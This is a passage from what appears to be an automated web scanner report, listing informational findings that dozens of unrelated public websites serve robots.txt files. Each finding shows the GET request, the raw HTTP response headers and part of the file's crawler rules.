Pics-Label: (pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.recipelink.com" r (nz 1 vz 1 lz 1 oz 1 cz 1) gen true for "http://www.recipelink.com" r (nz 1 vz 1 lz 1 oz 1 cz 1) gen true for "http://www.recipelinks.com" r (nz 1 vz 1 lz 1 oz 1 cz 1) gen true for "http://www.recipelink.net" r (nz 1 vz 1 lz 1 oz 1 cz 1) gen true for "http://www.recipelinks.net" r (nz 1 vz 1 lz 1 oz 1 cz 1) gen true for "http://www.kitchenlink.com" r (nz 1 vz 1 lz 1 oz 1 cz 1) gen true for "http://www.kitchenlink.net" r (nz 1 vz 1 lz 1 oz 1 cz 1) gen true for "http://www.allbaking.net" r (nz 1 vz 1 lz 1 oz 1 cz 1) gen true for "http://recipelinks.com" r (nz 1 vz 1 lz 1 oz 1 cz 1) gen true for "http://recipelinks.net" r (nz 1 vz 1 lz 1 oz 1 cz 1) gen true for "http://recipelink.net" r (nz 1 vz 1 lz 1 oz 1 cz 1) gen true for "http://kitchenlink.com" r (nz 1 vz 1 lz 1 oz 1 cz 1) gen true for "http://kitchenlink.net" r (nz 1 vz 1 lz 1 oz 1 cz 1) gen true for "http://allbaking.net" r (nz 1 vz 1 lz 1 oz 1 cz 1))
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

# This file warns search engine robots to stay away from certain
# areas of this site.

# Keep all robots away from our applications

Sitemap: http://www.recipelink.com/sitemap.xml

User-agent: *

U
...[SNIP]...

27.958. http://www.kivitv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kivitv.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kivitv.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS31
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/plain
Last-Modified: Wed, 04 Feb 2009 01:59:54 GMT
ETag: "60dab9456c86c91:a0e"
Cteonnt-Length: 818
Expires: Wed, 04 May 2011 01:17:54 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Wed, 04 May 2011 01:17:54 GMT
Content-Length: 818
Connection: close

# Please contact us for more information or permission to index deeper
# info@worldnow.com

User-agent: *

Disallow: /ads/
Disallow: /global/tools/
Disallow: /global/interfaces/
Disallow: /glo
...[SNIP]...

27.959. http://www.kiwicollection.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kiwicollection.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kiwicollection.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 01:06:05 GMT
Server: Apache
Set-Cookie: kiwi=i9pk10tc6snnr2rbhd2n3ns2s7; path=/; HttpOnly
X-Ua-Compatible: IE9=EmulateIE8
Set-Cookie: referrer=KIWI; expires=Sat, 03-May-2014 01:06:05 GMT; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 866
Connection: close
Content-Type: text/plain; charset=utf-8


User-agent: *

Disallow: /search/?sort*
Disallow: /search/?wow*
Disallow: /search/?grid*
Disallow: /search/?setting*
Disallow: /search/?country*
Disallow: /search/?map*
Disallow: /search/?activity*
...[SNIP]...

27.960. http://www.klout.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.klout.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.klout.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:05:39 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Mon, 27 Dec 2010 22:55:23 GMT
Accept-Ranges: bytes
Content-Length: 42
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow:
Disallow: /public

27.961. http://www.kmel.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kmel.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kmel.com

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 29 Apr 2011 02:16:00 GMT
Content-Type: text/plain
Content-Length: 275
X-Varnish: 4237022470 4236971309
X-Cache-Server: varnish03
Expires: Wed, 04 May 2011 01:31:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 01:31:27 GMT
Connection: close

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /cc-common/
Disallow: /jacor-common/
Disallow: /iplaylist/
Disallow: /admin/
Disallow: /timages/
Disallow: /_template/
Di
...[SNIP]...

27.962. http://www.kneeguru.co.uk/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kneeguru.co.uk
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kneeguru.co.uk

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:59:18 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Mon, 15 Jan 2007 00:50:37 GMT
ETag: "d65074c-17-42709a23df140"
Accept-Ranges: bytes
Content-Length: 23
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

27.963. http://www.knitting-and.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.knitting-and.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.knitting-and.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:53:00 GMT
Server: Apache/2.0.52 (CentOS)
Last-Modified: Tue, 19 Jun 2007 05:04:05 GMT
ETag: "5908d56-53-3e1cbb40"
Accept-Ranges: bytes
Content-Length: 83
Connection: close
Content-Type: text/plain

User-Agent: Googlebot-Image
Disallow: /
User-agent: ia_archiver
Disallow: /


27.964. http://www.koamtv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.koamtv.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.koamtv.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS37
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/plain
Last-Modified: Wed, 04 Feb 2009 01:59:54 GMT
ETag: "60dab9456c86c91:9aa"
Cteonnt-Length: 818
Expires: Wed, 04 May 2011 01:09:24 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Wed, 04 May 2011 01:09:24 GMT
Content-Length: 818
Connection: close

# Please contact us for more information or permission to index deeper
# info@worldnow.com

User-agent: *

Disallow: /ads/
Disallow: /global/tools/
Disallow: /global/interfaces/
Disallow: /glo
...[SNIP]...

27.965. http://www.kobesurprise.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kobesurprise.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kobesurprise.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:10:24 GMT
Server: Apache
Last-Modified: Wed, 14 Oct 2009 21:47:47 GMT
ETag: "1829fa-3b-4ad64703"
Accept-Ranges: bytes
Content-Length: 59
Connection: close
Content-Type: text/plain

User-agent: ia_archiver
Disallow: /
User-Agent: *
Allow: /

27.966. http://www.kohlerinteriors.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kohlerinteriors.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kohlerinteriors.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:02:28 GMT
Server: /2.2.14 (Unix) DAV/2
Last-Modified: Fri, 30 Apr 2010 19:08:15 GMT
ETag: "1b4838-19-48578f7269b11"
Accept-Ranges: bytes
Content-Length: 25
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

27.967. http://www.kontrolfreek.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kontrolfreek.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kontrolfreek.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 03 May 2011 09:21:42 GMT
Accept-Ranges: bytes
ETag: "8bdeee83739cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:13:32 GMT
Connection: close
Content-Length: 130

User-agent: *
Disallow: /productExports
Disallow: /trendingReports
Disallow:
Sitemap: http://www.kontrolfreek.com/sitemap.xml

27.968. http://www.koreatimes.co.kr/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.koreatimes.co.kr
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.koreatimes.co.kr

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 04 May 2011 03:08:10 GMT
Content-Length: 453
Content-Type: text/plain
Last-Modified: Sat, 09 Apr 2011 15:34:56 GMT
Accept-Ranges: bytes
ETag: "325ad6adcbf6cb1:123c"
Server: WWW Server/1.1
X-Powered-By: ASP.NET

User-agent:*
Disallow:/AxForm
Disallow:/Ajax
Disallow:/aspnet_client
Disallow:/PDF
Disallow:/events
Disallow:/Archives    
Disallow:/include
Disallow:/logs
Disallow:/tool
Disallow:/videos
Disa
...[SNIP]...

27.969. http://www.kost1035.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kost1035.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kost1035.com

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 29 Apr 2011 02:16:00 GMT
Content-Type: text/plain
Content-Length: 275
X-Varnish: 4238312461 4238180600
X-Cache-Server: varnish03
Expires: Wed, 04 May 2011 02:10:03 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 04 May 2011 02:10:03 GMT
Connection: close

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /cc-common/
Disallow: /jacor-common/
Disallow: /iplaylist/
Disallow: /admin/
Disallow: /timages/
Disallow: /_template/
Di
...[SNIP]...

27.970. http://www.krcrtv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.krcrtv.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.krcrtv.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 21 Jul 2010 20:24:00 GMT
ETag: "61702f9-11e-94fc9800"
Accept-Ranges: bytes
Content-Length: 286
Content-Type: text/plain
Cache-Control: max-age=296
Expires: Wed, 04 May 2011 03:13:13 GMT
Date: Wed, 04 May 2011 03:08:17 GMT
Connection: close
Set-Cookie: alpha=5dce8f18a260000021c3c04d7321090002af0000; expires=Sat, 01-May-2021 03:08:17 GMT; path=/; domain=.krcrtv.com

User-agent: *
Disallow: /print/
Disallow: /404/
Disallow: /tu/

User-agent: Googlebot
Disallow: /search/
Disallow: /print/
Disallow: /404/
Disallow: /tu/

Sitemap: http://www.krcrtv.com/sitemap.xml
Si
...[SNIP]...

27.971. http://www.kriyayoga.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kriyayoga.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kriyayoga.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:50:26 GMT
Server: God is Love
Last-Modified: Wed, 27 Oct 2010 14:24:34 GMT
ETag: "17-581-49399fc004c80"
Accept-Ranges: bytes
Content-Length: 1409
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

#
# robots.txt for http://www.kriyayoga.com/
#
# exclude some access-controlled areas
#

Sitemap: /sitemapindex.xml

User-agent: LiteFinder
Disallow: /

User-agent: e-SocietyRobot
Disallow: /

User-ag
...[SNIP]...

27.972. http://www.ktva.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktva.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ktva.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Sat, 30 Apr 2011 18:22:06 GMT
X-Server-Name: sj-c14-r2-u25
Content-Type: text/html;charset=utf-8
Date: Wed, 04 May 2011 02:09:43 GMT
Content-Length: 934
Connection: close
Set-Cookie: click_mobile=0

User-agent: *
Disallow: /documents/KY3+History.xls
Disallow: /results
Disallow: /internal
Disallow: /search
Disallow: /searchresults
Disallow: /southwest/southwestdesc
Disallow: /southwest/n
...[SNIP]...

27.973. http://www.kulichki.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kulichki.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kulichki.net

Response

HTTP/1.1 200 OK
Server: nginx/0.5.35
Date: Wed, 04 May 2011 01:32:13 GMT
Content-Type: text/plain; charset=koi8-r
Connection: close
Cache-Control: max-age=3600
Expires: Wed, 04 May 2011 02:32:13 GMT
Last-Modified: Fri, 12 Sep 2008 09:37:16 GMT
ETag: "1255016-21-48ca384c-koi8-r"
Accept-Ranges: bytes
Content-Length: 33

User-agent: *
Disallow: /kulstat

27.974. http://www.kyocera-wireless.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kyocera-wireless.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kyocera-wireless.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:41:49 GMT
Server: Apache/2.0.52 (CentOS)
Last-Modified: Fri, 15 Sep 2006 18:29:05 GMT
ETag: "10468f-14d-32f95e40"
Accept-Ranges: bytes
Content-Length: 333
Connection: close
Content-Type: text/plain; charset=iso-8859-1

# Robots.txt file created 2005/07/13
# For domain: http://www.kyocera-wireless.com

# All robots will spider the domain
User-agent: *
Disallow:

# Disallow select directories
User-agent: *
D
...[SNIP]...

27.975. http://www.ladygolf.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ladygolf.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ladygolf.com

Response

HTTP/1.0 200 OK
Content-Length: 96
Content-Type: text/plain
Last-Modified: Wed, 10 Oct 2007 21:55:00 GMT
Accept-Ranges: bytes
ETag: "fcd0be3488bc81:793a6"
Server: Microsoft-IIS/6.0
PSWEBSERVER: PSWEB06
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:49:11 GMT
Connection: close

User-agent: *
Disallow: /IBS/omnitureBaseJS.asp

Sitemap: http://www.ladygolf.com/sitemap.asp

27.976. http://www.lainks.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lainks.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lainks.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:29:28 GMT
Server: Apache/1.3.41 (Unix) mod_gzip/1.3.26.1a mod_ssl/2.8.31 OpenSSL/0.9.8i
Vary: Accept-Encoding
Last-Modified: Wed, 02 Mar 2011 01:12:31 GMT
ETag: "c0094-1f4-4d6d997f"
Accept-Ranges: bytes
Content-Length: 500
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /horde/
Disallow: /.sc/as/
Disallow: /.sc/oas/
Disallow: /.sc/ms/bdd/
Disallow: /.sc/ms/sc/
Disallow: /.sc/ms/co1/
Disallow: /.sc/ms/co3/
Disallow: /.sc/ms/co4/
Disallow: /.sc/
...[SNIP]...

27.977. http://www.lanecc.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lanecc.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lanecc.edu

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:19:23 GMT
Server: Apache
Last-Modified: Wed, 02 Aug 2006 05:37:00 GMT
ETag: "114c6-ab-41a0248c57700"
Accept-Ranges: bytes
Content-Length: 171
Connection: close
Content-Type: text/plain; charset=UTF-8

#For more Robots.txt information, please see http://www.robotstxt.org.

User-agent: *
Disallow: /WS_Admin
Disallow: /karodev
Disallow: /loridev
Disallow: /Examples

27.978. http://www.lastfm.es/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lastfm.es
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lastfm.es

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 02:54:11 GMT
Server: Apache/1.3.39 (Unix)
X-Proxy-Fix-Up: headers fixed up
Last-Modified: Wed, 10 Mar 2010 18:01:27 GMT
ETag: "24ba-179-4b97de77"
Accept-Ranges: bytes
Content-Length: 377
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /music?
Disallow: /widgets/radio?
Disallow: /show_ads.php

Disallow: /affiliate/
Disallow: /affiliate_redirect.php
Disallow: /affiliate_sendto.php
Disallow: /affiliatelink.php

...[SNIP]...

27.979. http://www.lasvegasdirect.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lasvegasdirect.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lasvegasdirect.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:22:10 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 31 Jan 2011 01:49:58 GMT
ETag: "112cc18-8d-49b1aa21b5d80"
Accept-Ranges: bytes
Content-Length: 141
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /agents/
Disallow: /search/index.php
Disallow: /reservations/

Sitemap: http://www.lasvegasdirect.com/lvdsitemap.xml

27.980. http://www.lawn-mowers-review.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lawn-mowers-review.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lawn-mowers-review.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:16:34 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.lawn-mowers-review.com/VPkO5xtS.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disallow: /d
...[SNIP]...

27.981. http://www.lbl.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lbl.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lbl.gov

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:10:18 GMT
Server: Apache
Last-Modified: Thu, 27 Oct 2005 20:50:35 GMT
ETag: "168828-6c8-4042286465cc0"
Accept-Ranges: bytes
Content-Length: 1736
Connection: close
Content-Type: text/plain; charset=utf-8

# robots.txt for http://www.lbl.gov/

User-agent: *
Disallow: /~jeffkahn/.private/ncswa-list.html
Disallow: /NCSWA/braintrust.html
Disallow: /NCSWA/roster.html
Disallow: /~mgelbaum/
Disallow: /~sls/
D
...[SNIP]...

27.982. http://www.lead411.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lead411.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lead411.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Content-Length: 760
Content-Type: text/plain
Last-Modified: Thu, 21 Apr 2011 22:41:39 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
Accept-Encoding: gzip
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:08:07 GMT
Connection: close

User-Agent: *
Allow: /
Disallow: /ssm/oAuth/
Disallow: /bioonly.taf
Disallow: /ssm/twitter/
Disallow: /ssm/facebook/
Disallow: /ssm/rss/
Disallow: /ssm/liprep.php
Disallow: /ssm/googlenews.php
...[SNIP]...

27.983. http://www.learn-acoustic-guitar.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.learn-acoustic-guitar.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.learn-acoustic-guitar.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 03:20:04 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=5d83f84779507a0476e53e089b8bbdb2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://www.learn-acoustic-guitar.com/xmlrpc.php
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.984. http://www.learnamericanenglishonline.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.learnamericanenglishonline.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.learnamericanenglishonline.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:50:44 GMT
Server: Apache
Last-Modified: Mon, 21 Mar 2011 07:14:00 GMT
ETag: "2319007-a8-4d86fab8"
Accept-Ranges: bytes
Content-Length: 168
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google
Disallow:

User-agent: *
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/

User-agent: googlebot
Disallow: *.csi

27.985. http://www.learnandmaster.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.learnandmaster.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.learnandmaster.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:09:22 GMT
Server: Apache/2.2.17 (Unix)
Last-Modified: Wed, 24 Nov 2010 19:30:42 GMT
ETag: "1d0d785-3e6-495d186603c80"
Accept-Ranges: bytes
Content-Length: 998
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=utf-8
Content-Language: en-US

#****************************************************************************
# robots.txt
# : Robots, spiders, and search engines use this file to detmine which
# content they should *not*
...[SNIP]...

27.986. http://www.leech.it/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.leech.it
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.leech.it

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "1227611401"
Last-Modified: Sun, 07 Sep 2008 15:44:16 GMT
Content-Length: 25
Connection: close
Date: Wed, 04 May 2011 01:19:29 GMT
Server: lighttpd

User-agent: *
Disallow: /

27.987. http://www.leeprecision.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.leeprecision.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.leeprecision.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:38:28 GMT
Server: Apache/2.0.63 (Red Hat)
Last-Modified: Wed, 16 Mar 2011 16:44:06 GMT
Accept-Ranges: bytes
Content-Length: 35
Cache-Control: max-age=2419200
Expires: Wed, 01 Jun 2011 03:38:28 GMT
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /staff/

27.988. http://www.legalforms.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.legalforms.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.legalforms.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:52:39 GMT
Server: Apache/1.3.34 (Unix) mod_ssl/2.8.25 OpenSSL/0.9.7e PHP/4.4.0 mod_perl/1.29 FrontPage/5.0.2.2510
Last-Modified: Tue, 25 Sep 2007 17:01:35 GMT
ETag: "1545664-1d-46f93eef"
Accept-Ranges: bytes
Content-Length: 29
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /ppc/

27.989. http://www.lessonplanspage.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lessonplanspage.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lessonplanspage.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:01:06 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11
Last-Modified: Fri, 18 Dec 2009 18:11:41 GMT
ETag: "21a2b19-223-47b04abe77140"
Accept-Ranges: bytes
Content-Length: 547
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google
Disallow: /cgi-bin
Disallow: /cgi
Disallow: /private
Allow: /

User-agent: *
Disallow: /phpads/
Disallow: /phpadsold/
Disallow: /ts1.8/
Disallow: /to/
Disallow: /forum
...[SNIP]...

27.990. http://www.lexapay.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lexapay.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lexapay.com

Response

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Wed, 04 May 2011 02:09:55 GMT
Content-Type: text/plain
Content-Length: 48
Last-Modified: Sat, 25 Dec 2010 04:01:26 GMT
Connection: close
Accept-Ranges: bytes

User-Agent: *
Disallow: /cgi-bin/
Disallow: /sr/

27.991. http://www.lexingtonlaw.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lexingtonlaw.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lexingtonlaw.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:06:16 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 1004
Connection: close
Content-Type: text/html; charset=utf-8
Set-Cookie: Coyote-2-c0a88784=a0c0214:0; path=/

sitemap: http://www.lexingtonlaw.com/sitemap.xml

User-agent: ia_archiver
Disallow: /

User-agent: *
Disallow: /_src/
Disallow: /sb/
Disallow: /jobs/
Disallow: /confirm/
Disallow: /mask/
Di
...[SNIP]...

27.992. http://www.lgsoftwareinnovations.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lgsoftwareinnovations.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lgsoftwareinnovations.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 99
Content-Type: text/plain
Last-Modified: Thu, 15 Apr 2010 15:13:07 GMT
Accept-Ranges: bytes
ETag: "b2e74127aedcca1:242e"
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIo OUR DELo BUS UNI COM NAV INT"
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:54:51 GMT
Connection: close

User-agent: *
Disallow: /bo/
Disallow: /css/
Disallow: /exe/
Disallow: /inc/
Disallow: /ute/

27.993. http://www.libraryofsheetmusic.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.libraryofsheetmusic.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.libraryofsheetmusic.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:42:42 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Sun, 01 Aug 2010 16:01:31 GMT
ETag: "407c54b-7b-48cc532870cc0"
Accept-Ranges: bytes
Content-Length: 123
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /terms-and-conditions.php
Disallow: /privacy-policy.php
Disallow: /contact-us.php
Disallow: /2.php

27.994. http://www.lifeaftertheoilcrash.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lifeaftertheoilcrash.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

